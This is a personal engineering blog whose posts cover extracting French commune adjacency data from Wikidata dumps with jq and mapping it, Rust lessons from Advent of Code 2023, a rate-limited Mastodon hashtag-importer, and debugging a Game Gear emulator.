Linux Engineer's random thoughts

Viewing adjacent French towns on Wikipedia

2025-05-05T00:00:00+02:00

It all started with this really simple nerdsnipe by Joachim (french):

How many clicks would it take to go from the Wikipedia pages of (southmost Metropolitan France town) Cerbères to (northmost France town) Bray-les-Dunes, using only Wikipedia's "adjacent communes links" ?

Quite a simple question. Many surprises.

Querying Wikidata

So, we want to know how to go from one page to another, clicking links. This is a graph problem, where the nodes are towns, and edges are the links between adjacent towns. So we first need to get this graph of towns and their connections (edges).

My first thought was simple, since this is on Wikipedia, why not query the structured data (more on that later) on Wikidata and see the result? Surely, a quick shortest-path on the resulting graph and it would quickly be done. Luckily there's a whole page on a Wikidata's wiki on how to query the french towns' data. The query would look like this, even displayed directly as a graph! Wow, so simple; does it mean we're done? Nope, there's a catch: you can't use the Wikidata query service to get all the data, because there is just too much, and it does not support pagination either. So, one has to find another solution.

A kind soul is running the WDumper service, so I tried it. Unfortunately after 20+ days my query still hasn't completed. Luckily, after a few hours I had already lost patience and sought to address this another way…

The Wikidata dumps are big (for my poor RPi4)

So, let's get the full dumps instead. Those dumps are well documented and at the time of writing only take ~89GiB of disk space… compressed. They use lbzip2, which compresses well and can use multiple CPUs, nice! In addition, each entity is on a single line, so they can be processed independently. Time to whip out the cli text processing-fu!

First, one needs to download the dumps. Unfortunately, the most recent dump available on torrent is already a year old. And one needs to store all of this. In addition, when I wrote this project I was abroad, with a 35GB quota on a 4G connection. Luckily I always have at least one computer available remotely, and I settled on an RPi4 at home where I have a big disk attached and fast internet connection.

So I went with curl initially, downloaded the latest dump over 12h or so and continued processing it. I would later find that the RPi4's anemic CPU would soon be an issue, so I re-downloaded it from multiple mirrors with aria2c (~25minutes) on a cloud instance to saturate the bandwidth.

Before going into more details of processing this data, let's look into what we want from it…

What's a commune anyway?

It's an administrative status in France. In Wikidata parlance, it would be an item which nature (property P31) is Q484170: a commune of France.

Communes are created and terminated all the time in France

At least, a few every year. Most of the time, those are merger because it uses less resources and we are stronger together. So any data from the previous year is most probably already obsolete. In Wikidata, this is represented with the property "end date", a qualifier marking a statement as "ended at a given date"; it is used to filter out old towns.

Also, since 2019, Paris is no longer a "commune", but has a specific administrative status. Other people have queried Wikidata using "sub-class of" as a qualifier to get all type of items that would match. There are 7 such categories, which I did not use in my data extract for simplicity; in addition Paris is currently not an instance of any of such categories; it uses yet another type. So I simply added an exception for Paris instead of filtering on its status itself.

Processing the data, line by line

Even using all available CPUs, extracting the file takes about 10 hours on the RPi4; and I didn't want to store the (presumably) huge json file, so everything is processed in a pipe. So to extract, I used lbzip2's lbzcat tool, which would allow starting the pipeline to do further processing.

Since this is json, I went with jq to extract the data. It started with a very simple (but wrong) query:

lbzcat latest-all.json.bz2 |tail -n+2 |sed 's/,$//' \
  | jq --indent 0  \
      'select(.claims.P31[]?.mainsnak.datavalue.value.id=="Q484170") \
       | { id : .id, name: .labels.fr.value , conns: [ .claims.P47[]?.mainsnak.datavalue.value.id] }' \
    > communes.json

To process the json line-by line we use tail to go directly to the second line and not be in an array; sed cleans-up the trailing commas from the array. jq's indent 0 option makes sure we also have one line per item. We only select items which claims include the property P31 (type) which has value Q484170 (commune of France). The data is then re-formatted to only have the elements we care about: the unique id, the french name of the town, and its connections: the list of ids of items in that are in its P47 (shares-border-with) claims.

Note that in this version, there is no array in output: just one json object per line, and no trailing commas either.

This version is nice, but unfortunately quite slow; jq is single-threaded and will only use a single core.

`lbzcat` is slow, `grep` is faster than `jq`

I iterated quite a while over the query, and each time I realized my mistake, I had to wait 12+ hours (lbzcat + jq bottleneck) for the pipeline to complete. After a while I lost patience and rented temporary beefy instances to do the download and processing. And after a while, it hit me: I was duplicating too much work.

So, the trick I used to reduce the processing time was to store only the items that contain "Q484170":

lbzcat latest-all.json.bz2 | grep \"Q484170\" |lbzip2 --fast > contains-Q484170.json.bz2

GNU grep is also very optimized (and we could even go faster with hyperscan/ripgrep), so even if we get more data than we need, this saves us a lot of time.

The temporary file only weighs 223MiB, which is much more manageable, and can be downloaded to be processed on my faster laptop, which can uncompress it in less than 30 seconds.

The final iteration of the processing looks like this:

echo [ > communes-new-only.json; \
    lbzcat contains-Q484170.json.bz2 | sed 's/,$//' | jq --indent 0 \
        'select(.claims.P47 != null and .claims.P31[]?.mainsnak.datavalue.value.id=="Q484170") \
        | . as $r | .claims.P31[]? \
        | select ($r.id == "Q90" or (.mainsnak.datavalue.value.id == "Q484170" and .qualifiers.P582 == null)) \
        | { id : $r.id, name: $r.labels.fr.value , conns: [ $r.claims.P47[]?.mainsnak.datavalue.value.id], \
            coord: { latitude: $r.claims.P625[]?.mainsnak.datavalue.value.latitude, \
                     longitude: $r.claims.P625[]?.mainsnak.datavalue.value.longitude}}' \
    | sed 's/$/,/' >> communes-new-only.json ; \
    truncate -s-2 communes-new-only.json; \
    echo ] >> communes-new-only.json

Wow, that's a lot of text and commands. Let's unfold what's new:

we now want to create a directly usable, valid json. For this, we first open and close an array in the first and last echo commands;
the second sed command adds commas at the end of each generated line;
in json, trailing commas aren't valid, so we trim the last one with the truncate -s-2 command;
And the jq query is now a bit more complex:
- we still only want items which one of the types (P31) is a commune (Q484170);
- we filter for communes that do have other neighbouring communes, i.e, their P47 is not null;
- to ease manipulation, the root item is marked as $r, and we go matching into the .claims.P31[] array;
- then we start the selection; we can see here the special exception for Paris (Q90);
- otherwise, we look into the communes that don't have an end date (P582 is null), i.e, it's a proxy for inferring they still exist (we ignore any that would be ending in the future);
- we also added the target coordinates in the generated json.

Wikidata is not Wikipedia: the data is not that clean

Did I say that Wikidata is just the structured version of the data in Wikipedia? Well, I was wrong. Wikidata is an entirely separate database and project. There might have been imports of the data in the past, but obviously it's not kept in sync automatically. I know because I have found a few inconsistencies.

A few examples of issues I've seen:

Links between communes across France; For example Saint-Jacques-de-Néhou - Sault, (which I fixed):

Most of the time those are because of homonyms, but sometimes, there is no apparent good reason. There's even a query about this on the Wikidata wiki, but not all the results have been fixed yet.
Missing links; For example, Escorpain (which I fixed):

Which is weird because on the corresponding Wikipedia pages the adjacent towns are well documented. That's how I found that the Wikidata and Wikipedia data aren't really in sync; I've always thought that Wikidata was just an export the infoboxes found on the Wikipedia ages. It is not. Of course, it's possible to write scripts and bots to do the sync, but by default it isn't done.
Incorrect coordinates; here Trois-Rivières:

This one is a recent commune (created in 2019), and its coordinates have already been fixed by someone else. And you can see in its article (french) that it does not have the French-Wikipedia-specific "shares border-with" section (it's a paragraph instead) that is (or was) the subject of this article.

Viewing the data

Apache ECharts is nice…

So, to view all of this, I started with Apache ECharts, a generic and full-featured js visualization library. I used the graph chart, with fixed coordinates to prevent the simulation of the force layout. In addition to this, I added a map layer to show the shape of France, generated by the France GeoJSON project.

It soon became apparent that I could not show all the data at once, so I added code to arbitrarily limit the number of nodes of the graphs to show, and their edges. One needs to to zoom enough to be able to see all the nodes and their links. You can look at what I came up with here.

but not the right tool for the job

Unfortunately there are bugs that I wasn't able to shakeout: for example, the graph and map get de-synchronized when zooming. And the map wasn't very usable, including on mobile; I even reported a such an issue.

With all this, I realized I just wasn't using the right tool for the job. I needed to start looking at libraries dedicated to viewing geographical data: maps.

Maplibre GL js

After a quick look at leaflet, I settled on Maplibre GL JS for performance reasons. Maplibre is a fork of all Mapbox libraries from the last open source version, and it has great engineering and documentation.

So I rewrote it all and tranformed the graph in a GeoJSON structure, with nodes as circles. All the the data was sent to the library without any filtering. And it was buttery-smooth, despite the 34830 nodes and 102094 edges, in addition to the GeoJSON background; I was able to throw away a lot of code and let Maplibre handle the performance details. Hopefully it's not too slow on your browser.

The maps previously included in this article are in fact based on the viewing code integrating Maplibre I came up with. I copy/pasted examples from the doc and added a filter by name, center and zoom coordinates parameters. Here is another example viewing the smallest commune of France by area (Castelmoron-d’Albret):

And the largest:

Or the commune with a population of 1, Rochefourchat:

… what's the answer by the way?

Oh yes, that question, of the number of clicks... Well, I did not get to that part, but someone else did.

But they did it using another data source from the French government, itself extracted from OpenStreetMap. The dataset was extracted in 2022, so it's probably obsolete; the towns are referenced by their unique INSEE ID, which is also in Wikidata (property P374), so it could be compared to the dataset I extracted pretty easily. This is left as an exercise to the reader.

What I learned during Advent of Code 2023

2023-12-27T20:00:00+01:00

Advent of Code is an Advent calendar of small programming puzzles. I participated in this year's edition, finishing it for the second time in row. The puzzles of all editions are always accessible.

The principle is to read the problem, get a puzzle input (more or less tailored to your account), process it anyway you like (with code you wrote, most of the time), and then put the (short) result in the website for it to validate your answer.

I wrote solutions in Rust again this year, so let's see what I learned about the language, trying to reveal as little as possible from this year's problems.

Rust

Tuples

In Rust, tuples are comparable, hashable, and have default values. This is very handy to sort a list of tuples, or initialize them with Default::default(). This can be handy in order to write shorter code.

Iterators

I started this year with an idea of solving the puzzles (that could) in a single pass. But I still want the parsing to be separate from the algorithmic resolution. For that, instead of parsing the input data into a Vec, the parsing function would return an iterator. This is what I put in my template:

type ParsedItem = u8;
fn parse(input: &str) -> impl Iterator<Item = ParsedItem> + Clone + '_ {
    input.lines().map(|x| x.parse().expect("not int"))
}

The idea would be to change the type of the parsed item, and edit the parser to return this type.

Note: the Iterator has to be Clone because I'm using it twice, once for part 1, and another for part 2. It has a lifetime because it takes ownership of the input, which is an &str with the same lifetime.

I'm aware that this means that the parsing would happen twice, once for each part, sort of defeating the point of a "single pass".

For days 1, 2, 4, 7, 9, 12, 13, 15, 18, 19 and 22, this approach worked well. But for days 5, 6, 8 and 20 I removed the iterator approach from parsing entirely. For days 3, 24 and 25, I wrote the parsing as an iterator, and then immediately used .collect() to put it in a collection data structure. For grid problems, I initially did the same: iterator, then collect (10, 11, 14); but caught on and removed the iterator as well for days 16, 17, 21 and 23.

What this shows is that there is no magic solution, it always depends on the problem. I think I learned enough about iterators, so that next time I might go back to a simpler approach.

Enums vs raw data comparison

Last year, in my solutions everything was parsed to an abstract representation and had a given data type. This year I opted for a simpler approach, mostly for speed of writing: when needed, compare a char directly in the code. It makes it less abstract, but the code is mostly write-only.

This contrasts with the Iterator approach: as I master more Rust features, I use them a bit less, only when I deem necessary. I used enum representation for 4 out of 25 days.

`u8` vs `char`

In Rust, char represents an unicode character, the equivalent of a rune in go or wchar_t in C. But during AoC, all input is purely ASCII, so this is overkill to use a 4 bytes type to represent 1 byte of data. I started the month using Vec<char>, for grid rows, but finished the month mostly using Vec<u8>. ASCII u8 literals are possible by prefixing b to a single-quoted character: b'@'.

Borrow checker

I'm getting much better at guessing when something would or wouldn't trip the borrow checker (except maybe day 20 where I was a bit too optimistic). So often I won't use iter(), but use indexed accesses if I need to modify multiple arbitrary elements during an iteration.

I'll often take shortcuts too, and using multiple cloned String instead of &str.

When needing to add memoization to a recursive algorithm, I noticed again that one couldn't use the Entry api of HashMap, because it borrows from the HashMap.

`usize`-only indexing is still annoying

Not really a new learning, but it is still as annoying as before than one cannot index slices with anything other integer than usize. It makes the type pervasive when wanting to write code quickly. To prevent repetition of casting, I might often have two variables with the same data, one of which is casted to usize.

I think the rust compiler could allow indexing with any unsigned type smaller than the current platform's usize without any loss of correctness. I realize this is not as trivial because of the way slices implement the Index trait, but this would improve ergonomics. It could even add additional bound checking when indexing with signed negative numbers, but I realize this would go against "zero cost abstractions".

Z3

As a given problem was quite complex, I had to resort to using a solver. I chose one the most used nowadays, z3, and its library's Rust bindings. Since it depends on a C++ library, it a bit challenging.

Despite what the doc said, there were no examples (I'm not the only one who noticed). Luckily, another crate, z3d had examples for its uses that also included the z3 equivalent code.

It did not build on Fedora because the published crate did not use pkg-config to find z3.h, but a hardcoded path instead. It provided environment variables to configure this, but this isn't exactly the most portable way to build a dependency, since I wanted the project to build in the (ubuntu-based) github action CI, as well as my Fedora laptop.

The crate z3-sys (low-level bindings) has an embedded version of the z3 library that it could use instead with a feature flag, but this is a big project, and it takes a bit long to build on my laptop. In the end, I moved to the git version of z3 which added pkg-config support, and it works flawlessly on both my laptop and the CI.

I was also a bit annoyed by the ergonomics of using z3 directly; I saw that z3d provides an additional abstraction layer to make it a bit more ergonomic, but I did not try it.

ints helper

One of AoC's often recommended helper to have in your "toolbox", is a function that parses multiple integers. I finally wrote one (it returns an Iterator), and while it had a rough start, I still used it for 5 different problems.

I also finally wrote common LCM and GCD code for reuse.

Small things

I usually comment the debug statements after finishing. For debug helpers, I now start them with an _ (underscore) so that it won't show an unused code warning anymore.

Incremental debugging: just like LSPs, running the program in a loop in an another window to see the output of debug statement during parsing is very useful.

Algorithms and general tricks

Grid iteration

When working with grids, one should pick a coordinate system, and stick with it all the time. I use mostly (x, y); but (row, column) makes a lot of sense, especially for grid indexing.

I have become quite proficient at grid iteration now. The main tricks I use are lifted from watching Johnathan Paulson's real-time solves. The first is to just iterate over an inline array of offsets:

for dir in [(0, -1), (1, 0), (0, 1), (-1, 0)].into_iter()

And then for each, just check if they go over the map boundaries.

But that's just the beginning: if you need to remember in which direction you're heading, just use a number from 0 to 3, making them consecutive, clockwise for example: North = 0, East = 1, South, = 2, West = 3. Then you can use very simple map operations to change directions:

to rotate 90° clockwise, just add 1 (and then modulo 4). Add 3 (and then module 4) for -90° (or 270°).
to go in the opposite direction, add +2 (and then modulo 4).

You can also use the direction as an index into the array I showed in the above example. This modeling greatly simplifies code for grid problems.

Tortoise and Hare: not this year

A few times this year, detecting a cycle was necessary, and I thought I could reuse something I learned from last year (and the code I wrote). But this wasn't necessary.

Floyd's tortoise and hare algorithm is very useful to detect when a cycle has happened in a series of comparable things. It can return the start of the first cycle, and its period. But it's only really useful when there are hidden dependencies between different states of the series. If a given value always gives the same next state, then using Tortoise and Hare is overkill, and a simple set is sufficient.

Transposition

At least one time, I wrote quite complex code that could have been greatly simplified using transposition. No need to make an algorithm work in all four directions, if a simple transposition can make you apply it to a different direction.

To transpose a grid, iterate over columns first instead of rows to generate another grid. Then you can transpose again to get the original grid back.

This can be combined with horizontal or vertical flipping in order to do a rotation. All of this was explained in HyperNeutrino's solution explanation for a given day (contains spoilers).

Shoelace formula and Pick's theorem

These two showed up twice. The first time they weren't mandatory (ray casting was sufficient), but as I looked at other people's solution, I noticed how elegant it was; so I used it for the other day, when it was finally mandatory.

The shoelace formula can give an arbitrary polygon's area from its vertices coordinates. Pick's theorem gives the area of a polygon with integer coordinates. It's interesting because its formula uses the number of the points with integer coordinates.

So if one wants to count the points inside a polygon (with integer coordinates), the idea is to first compute the area A of the polygon with the shoelace formula, then use Pick's theorem to get the number i of points inside:

i = A - b / 2 + 1

b here is the number of points with integer coordinates on the polygon edge. So on a segment with integer bounds, all integer points on it should also be counted.

In addition, when working on grid, the area from the shoelace formula should include the points on the edge as well.

Gaussian Elimination

This one I put here, but did not learn. That's where I decided to use z3 instead. But I'm now aware that in order to solve multiple linear equations, there exists Gaussian Elimination, an algorithmic approach using matrices.

Visualization and input analysis

For Advent of Code, it's not required to write a general solution to every problem. Only one that solves it for the current input. Some problems might seem intractable in the general case, but after analyzing the input, it might in fact be specially crafted to have a simple solution, or other properties.

So for this edition, I learned to use the graphviz's dot language in order to generate graphs. Those can also be used for debugging graphs much more visually than ASCII text.

Closing the gap on fediverse hashtag visibility with hashtag-importer

2023-10-02T00:00:00+02:00

I have released a small application, hashtag-importer, that users of a Mastodon instance can use to slowly import more content from low-traffic hashtags, into their instance (with their admin's permission).

Why hashtag-importer

In the fediverse, your server might not see all posts made by everyone; it should only see posts that appear in anyone's timeline. So if no one on your server follows a user, you won't see their posts, even if you're subscribed to a hashtag and they use that hashtag. If your Mastodon instance is small, you'll often have niche hashtags being unusable. For server admins, a simple solution is to use relays, and Mastodon supports it. But what if you're not admin ? That's where hashtag-importer comes in.

How it works

Most servers (but not all) have publicly-available hashtag timelines. You can use those to get new posts from hashtags of your interests elsewhere. But wouldn't it be better to be able to read those on all your Mastodon clients, directly from your instance ?

The second part is in fact very simple, and a "core" part of the fediverse user experience: copy/pasting links to posts. If you paste a link to a post in your instance's search, the server will fetch the post, and become "aware" of it; it will have been imported, just as if it had appeared in someone's timeline. It will become available on the global timeline and indexed hashtag timelines. So that's what hashtag-importer does, it automates this copy/pasting.

Crates galore

hashtag-importer is written in Rust, and relies on reqwest for HTTP requests (in blocking mode only, life is too short for async™), toml and serde for the config file, clap for argument parsing, webbrowser for opening a webpage to get permissions, anyhow for care-free error management and governor for rate-limiting. Building pulls about 160 crates in total with transitive dependencies. I'm usually wary of adding too many dependencies, but this time I didn't hold back, and it shows. At least one of those isn't really necessary, I'll let you guess which one ;-) (Update: it has been removed)

There's little practical advantage to using Rust here, it was mostly done for fun. I've written small tools like this in go or python than can be just as reliable. I wanted to see what were the ergonomics of writing this type of client code in rust, and it works well in general. The main service loop ended up being a bit long, but that's only because I haven't taken the time to split it properly (Update: it was split).

Rate-limiting

Before writing this tool, I asked my Mastodon instance admins, the Treehouse Staff, what they thought of the idea, and if they would be opposed to adding this type of invisible automation. They suggested that I should add rate-limits:

"1 req/min, 20/hr […] with some sort of per-upstream limiting".

As I was almost done, I realized, my strategy to sprinkle calls to sleep() around the code was not going to cut it. That's why I turned to the governor crate, which implements GCRA, a well known leaky-bucket rate-limiting algorithm. It made things very simple, except for the fact that hashtag-importer did not use async, even for network code; and the governor crate only provided a way to wait for resolution using an async fn. So I had to add blocking helpers to wait for the next rate-limit deadline (~12 lines of code).

In the end, it was an interesting learning experience, and the code is much more readable with limits than with sleeps. So I want to thank the Treehouse Staff for providing valuable feedback upfront (and letting me run hashtag-importer on the instance).

Real-world use: Kernel Recipes

This tool was started just before Kernel Recipes, so the conference was used as an opportunity to import more posts on the #kr2023 hashtag. It found a few posts that weren't visible from my instance, even though I'm already well connected to many attendees. I wrote the Kernel Recipes live blog, so I didn't have much time to watch social networks, but it did prove somewhat useful !

FAQ

Does it support other fediverse software than Mastodon ?

Most probably not, it wasn't tested with anything else, and developed against the document REST API of Mastodon. It does not work with Firefish for example.

Can I run this without asking my admin first ?

No, even with the care taken to lighten the load, you should always ask your admin before adding this type of automation.

Why do you hate async in Rust ?

I do not, I just did not take the time to learn enough, otherwise you wouldn't be reading this article. I still hope to convert this app to using async/await some time in the future.

February to April Gears emulator update

2023-05-02T00:00:00+02:00

Previously, I had a bug in my gears emulator, which I then fixed. But Sonic 2 still wasn't working, so let's see what went wrong there.

Missing interrupt behaviour

The Sonic 2 ROM wasn't starting at all, leaving an uninteresting black screen, which led me to suspect some kind of infinite loop. I said in the previous posts that I thought this loop could have been related to timings or interrupts.

So I looked at how the game behaved in Emulicious, another (closed-source) emulator with great debugging capability. And I noticed something weird on my side of the emulation: after a HALT instruction (that shuts down the CPU similarly to running an infinite number of NOPs), the VDP interrupt would wake-up the CPU, it would be handled and return. But when returning it jumped straight into the previous HALT instruction (!), meaning it looped and never moved forward. I fixed this by implementing the missing PC increment, and it set forward the startup of Sonic 2.

Later, I went looking at another game that didn't finish starting: Global Gladiators. I figured it might be something related with an infinite loop somewhere + interrupts. I went to the frame that froze...

... and I noticed something similar: a loop reading from the VDP V Counter (or line counter), waiting for it to be 0xC0. But it never happened ! Because at 0xC0, the VDP raised an interrupt and by the time the interrupt was handled, the VDP already had processed a few other lines. So the code looped, waiting for an event that never happened. Emulicious seemed to send the interrupt at 0xC1, contrary to what the official Game Gear manual said would happen; but Charles McDonald's VDP documentation from 2002 said it should happen 0xC1. So I simply fixed it by using this same value. But something tells me there might be other timing-related bugs hiding here. At least I can now play on of the greatest games of the platform 😉

How about this ?

Did a brand pay for this ?

In the end, this untested interrupt code is the source of multiple bugs... I might need to find a way to write simple test for these.

Palettes

This one is a quite simple and well-documented VDP feature for background patterns: there's a bit to have them use the second color palette (usually for sprites). It allows using 16 more colors for the background: background can use 32 colors, while sprites can only use the second half (16) of those colors at a given time.

Bad rendering: which character is selected ?

Palette bit is used to implement character selection

The color palette select bit was already decoded, but not used for rendering, so the fix was straightforward.

Bad rendering with palette 0

Sonic and Tails use pallete 1

Making sounds

After fixing enough VDP bugs that many games are now playable, I started looking into making sound. I used the rust crate cpal which seemed like the most well-maintained and portable for abstraction for playing audio. After a PoC to play a simple 440 Hz sinusoid, I slowly wired things up. The programming model of cpal is to provide a callback that will be polled by an audio thread, so it forced my design to do more Send+Sync data structures, while initially everything in gears was single threaded, with the use of Rc for some simple high-level things like dynamic device registration. It forced me to use Arc and Mutex to ensure the PSG data structures would be shareable across threads.

I was inspired by the design of the VGM 'audio' files, which are just basically command dumps from the PSG writes. Audio rendering is done as late as possible to ensure being as independent as possible from the sample format. The queue of commands updates the PSG internal state, and it generates audio when cycles go forward.

Just like with the VDP, the CPU cycles are the reference, so instruction cycles need to be correctly counted or emulation can be visibly changed.

Audio is played in real time, so there is a high accuracy component to ensure what comes out sounds 'good'; and in gears, synchronization is far from done — not because of instructions: cycle accuracy is good enough to pass the fuse test suite. But because the emulator currently relies on VSYNC to do 60 frames per second: it's very convenient that all my screens are also at 60Hz, like the Game Gear's LCD!

But since frames during which the VDP is BLANK (screen "off") are not displayed, the emulation goes too fast during blank frames ! It means that PSG commands will accumulate and need to be "flushed" later on to keep the queue from growing indefinitely; this leads to weird fast music effects, then going back to normal speed, like during the beginning of the Green Level in Sonic 1:

</audio

As you can hear, in addition to proper synchronization, there are other things missing, like noise generation. Maybe for the next update ?

January Gears emulator update

2023-01-28T00:00:00+01:00

Previously, I had a bug on my emulator with the way the map is rendered.

With the bug

How it should look like

After I wrote the previous article, I posted it on the SMS power discord, asking for ideas on this corruption bug. Many great people chimed in.

A question I had was if I could dump the tileset to look at the video ram of the VDP to find out if anything might be corrupted.

Interlude: Tilesets

A tileset is the list of tiles (sometimes called "patterns" or "characters") in memory that can be be used for background or sprites.

On a typical Game Gear game, those live in the ROM, then are copied in Video RAM (VRAM) once the ROM is mapped in the address space. They can only be displayed by the VDP from the VRAM.

The VRAM can hold 512 tiles, and each tile is 8x8 pixel. So I initially rendered the memory region in a 256x128 tileset (32x16 tiles)

But the map looked weird, and someone rightfully told be it would look much better if rendered in the other dimension (16x32 tiles):

The map is entirely visible! It's as if the artists worked exactly like this. We can clearly see the corruption bug in the first two tile lines.

Something feels off though: it seems like the bottom half (usually used for sprites) is using the wrong palette. In the VDP, background can use both palette 0 and 1 (0 by default), but sprites always use palette 1. Let's render the bottom half with palette 1 instead:

Transparency is also respected which you'll be able to see by dragging the image on a desktop browser (grey backgrounded added for readability).

But something is still missing. Like those sprites are split or something. What if we tried to honor the SIZE bit for the bottom half in order to see double-size sprites ?

Much better ! We can clearly see Dr Eggman, numbers, as well as the level lines. Now that I had a nice-looking tileset, maybe I could try to find the source of the corruption ?

VRAM read/write CPU buffer

An SMS Power member suggested that it might be related to the incorrect reads from the VRAM. What did they mean ?

Here is how I imagined the a VDP read and write to VRAM happened:

CPU would use an OUT instruction to the VDP to select the I/O address, and then would do an IN for the VRAM read; VDP would respond by fetching the data and giving it to the CPU.

For the write, after an OUT instruction to set the I/O address, and an other OUT would write the data directly to VRAM.

But of course that's not how any of this this works. Because of physics. There's a real latency to do I/O to and from VRAM. And to work around that, the VDP has a 1-byte "cache" buffer used for VRAM transactions.

A more accurate version would look like this:

There are actually two types of OUT addresses to set an I/O address: one for setting a read address, and another for a write address. And they have different behaviour, which is not at all apparent in the official Sega Game Gear Hardware reference manual.

Setting a read address, will immediately trigger the read to VRAM. This read will be stored in the 1-byte buffer in the VDP. The subsequent IN instruction will read data directly from this buffer, instead of from VRAM. This way the latency stays manageable. And just after the each read, from VRAM, the VDP will auto-increment the VRAM address, and fetch the next byte.

For writes, the story is similar, except setting the write address has no other side effect. Doing a write will first write data in the 1-byte buffer, write the buffer to VRAN, and then auto-increment the address.

Why the auto-increment ? Because it allows this kind of pattern:

Sequential access. The address only needs to be set once, and then the following I/O will automatically be at the next address. For reads, it also means that the next byte should already be pre-fetched and readily available in the buffer. It's a particularity of Reads: they only happen from the 1-byte cache buffer, and trigger the next byte fetch.

You probably see where I'm going with that. What if you do a read without any previous read or read address setup ?

You have an edge case ! You'll read whatever was in the buffer in the VDP, and this might not be what you expect.

Here is another edge case to show a more likely sequence of operations:

Setting a read address will do the fetch in the 1-byte buffer, and also auto-increment the VRAM address in the VDP; so if the next instruction is a write instead, the write will happen at address + 1 ! And if you do a subsequent read, you'll read the value of what you previously wrote, which is not really useful.

The way the hardware works is in fact more complex than what I expected. And this was widely known at the time, the developers used this behaviour in actual ROMs, for example to skip a byte after a read and write at the following byte.

Once I fixed that I noticed that Sonic Triple Trouble's demo behaviour changed, which broke some tests. I can no longer automatically reproduce the screenshots from the previous article, because they were generated with a buggy VDP read/write implementation.

And this bug ?

Unfortunately, adding the 1-byte buffer did not fix the map corruption bug.

So I had to go deeper, and look at the code being executed. In its current form, gears does not have a debugger; but there a few features: pressing space can stop/start the execution, I also added single-frame stepping with another key. And there's a parameter in the code to print every executed instruction. Coupling that with tracking down VRAM accesses (read and write), I noticed something weird, a dozen or so instructions before the corrupt data was written: two consecutive read instructions, that went from address 1023 to 0, with no address setup in the middle. It's as if the auto-increment wasn't working !

Once this issue was noticed, finding the buggy code and fixing it was quite simple. I had put a wrong constant for VRAM address auto-increment, but only for reads; I later removed open-coded constants to prevent this type of issue.

Finally, here is the tileset, as generated without the corruption issue:

Startup tileset

I also generated the tileset for the starting animation of Sonic 1 for fun:

Bonus: region

As I was tracking down this issue, I wondered if this could be related to some other feature/device I didn't implement. I looked at the system I/O port and found that I did not implement the region bit, hardcoding World (instead of Japan). I was surprised to see my regression tests start failing when I changed the region:

Sonic splash screen on World region.

Sonic splash screen on Japan region.

The ™ disappeared ! I remember reading about this online, so this is already widely known, but it still surprised me. It also affects the Press Start screen:

Sonic Press Start screen on World region.

Sonic Press Start screen on Japan region.

What's next ?

Many games still don't work at all, starting with Sonic 2 that does not display anything, just a black screen. I might look into what happens there next. I suspect it might be something related to timings or interrupts, but who knows ?

December Gears emulator update

2023-01-04T00:00:00+01:00

I wrote here about how I'm writing an emulator. How has it progressed ?

Fixing a rendering bug with backgrounds

In November I wrote on mastodon how I was tracking down a rendering bug.

To track down this issue with weird data on screen, there was already too many messages, so it was very hard to find anything with printf debugging. So I added a border to every bg/sprite character, and encoded the pattern number in the border color. I didn't know if it would work but it looked fun:

I then slightly changed the encoding in border color (zoomed for visibility):

After that, I continued working on unrelated things. I took some time to play the game a bit more in the emulator, which finally gave me an epiphany. Once I had identified the issue, fixing was fairly straight forward. It was missing wrapping in x.

This is because you can imagine the background in the Game Gear VDP as a torus: on this torus, the viewport (the game visible area on the LCD) is a window showing the actual content, controlled by scroll offsets in X and Y.

Of course in memory, this "torus" is just a simple and straightforward memory buffer. So implementing it means wrapping around when the viewport reaches a border of the memory buffer.

Wrapping in Y was working already because rendering is done line-by-line and once the proper line is selected, it stays the same.

Wrapping in X simply wasn't done, so once a border was reached, instead of continuing rendering on the same line, we actually went to the next line ! And it also means that sometimes a line would be rendered that should never have been on screen, hence the weird looking data.

I'll let you compare this screenshot with the previous one:

And a final note: I was focusing entirely on the wrong thing here, only seeing the weird data, and not the other rendering bug completely shifting the background screen by 8 pixels.

In the end, the fix was relatively simple.

Implementing missing features

Off-by-one error in sprite rendering

This one was found by looking at other emulators and noticing something weird in Sonic's splash screen :

Before

After (correct render)

Can you see it ?

Here, I added a line to let you see it more easily:

Before

After (correct render)

This is due to the way the coordinates are handled for sprites. They should be offset by one pixel (compared to what I did before) ! Here is another example, zoomed in on Sonic's hand in the Press Start screen:

Before

After (correct render)

Background priority over sprites

On the Game Gear VDP, background tiles have a priority bit that allows them to be in front of sprites. This is very useful to give an impression of depth. Usually it's done so that one color from the background is not above sprites. So blending looks seamless. When rendering the background, the emulator should keep track of patterns that have the "PRIO" bit, and render them always in front of sprites (except for color code "0"). Here is a still from Sonic Triple Trouble before and after implementing background priority:

Before

After (correct render)

In this frame the trees are part of the background, and have the PRIO bit set. So they should be rendered over sprites: Sonic, but also the game status in the upper left corner !

Priority between sprites

Here is Sonic 1's first frame:

Before

After (correct render)

What happens here ? Surely the first one is the correct one ? It left me just as confused as you when I looked at other emulator's rendering of this first frame. I even checked on a real Game Gear just to be sure!

The 64 sprites available on the Game Gear/SMS VDP should be rendered one by one, in the order they appear. The first sprites have priority over the later ones. This means the later ones should NOT be rendered if another sprite was rendered on a given pixel (except for transparent colors…).

So what happens on this frame ? Luckily the debug mode I developed earlier is still in the code base behind a config flag that is easy to toggle:

The game uses higher-priority blank sprites to hide the rest of Sonic ! (probably from a re-used routine). This is so that in the animation where the Sega logo appears, it looks like there's a magic line that makes everything appear. And Sonic's feet and hand would go over that line ! So they were hidden by developers by putting blank (but not transparent) sprites before Sonic.

A remaining map bug

There might be plenty of remaining bugs, but here is one I found in Sonic's map screen after I implemented background priority:

Before (bad)

After (still bad, but worse)

The current level line and number of lives disappeared ! Why ? I don't know !

It seems the background priority are incorrectly set. I have no idea why it does this.

After I saw this I thought I caused some kind of regression, so I added a test framework to generate frames and compare them with a "good" render to prevent regressions. This is how most frames in this section where generated, and why the filenames have a weird naming. You can check how it works in the repo and the test frames.

But it's not the only issue for this frame ! Here is how this frame should actually look, if we check how the map is rendered with another emulator:

How it looks like currently

How it should look like

I'm not sure I'll try very hard to fix this one. I'll probably go slowly and think about it in the background, waiting for the right epiphany.

Update: I wrote about how I fixed it.

FOSDEM talks and emulation

2022-10-16T00:00:00+02:00

In 2019 I gave a talk at FOSDEM in Brussels on the "music portal", a device I built for my children as a toy that plays music. I wrote about the first version in awk here. The talk revolved around the specifics of the Go language and how it was used to industrialize a prototype into reliable appliance with gokrazy.

In 2021, I started working on an emulator; it's one of those things I always wanted to do, and it finally seemed simple enough, with all the experience I had, from writing small assembly bots, improving the ESIL emulator (which relied on the capstone disassembler), or working with qemu in my previous day job. I picked a platform from my childhood, and started typing during my summer break.

